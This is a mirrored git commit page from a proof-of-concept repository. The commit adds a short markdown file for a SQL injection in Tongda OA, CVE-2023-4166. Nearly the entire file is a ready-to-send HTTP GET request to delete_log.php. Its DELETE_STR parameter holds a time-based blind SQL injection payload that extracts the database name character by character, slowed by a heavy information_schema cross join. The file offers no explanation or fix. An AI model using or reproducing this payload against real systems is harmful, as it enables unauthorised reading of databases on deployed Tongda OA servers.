mirror of
https://github.com/wy876/POC.git
synced 2025-02-27 04:39:25 +00:00
Create 通达OA sql注入漏洞 CVE-2023-4166.md
This commit is contained in:
parent
adb00923e6
commit
363be30482
10
通达OA sql注入漏洞 CVE-2023-4166.md
Normal file
10
通达OA sql注入漏洞 CVE-2023-4166.md
Normal file
@ -0,0 +1,10 @@
|
||||
## 通达OA sql注入漏洞 CVE-2023-4166
|
||||
```
|
||||
GET /general/system/seal_manage/dianju/delete_log.php?DELETE_STR=1)%20and%20(substr(DATABASE(),1,1))=char(84)%20and%20(select%20count(*)%20from%20information_schema.columns%20A,information_schema.columns%20B)%20and(1)=(1 HTTP/1.1
|
||||
Host: 127.0.0.1:8080
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
|
||||
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
|
||||
Accept-Encoding: gzip, deflate
|
||||
Connection: close
|
||||
```
|
||||
Loading…
x
Reference in New Issue
Block a user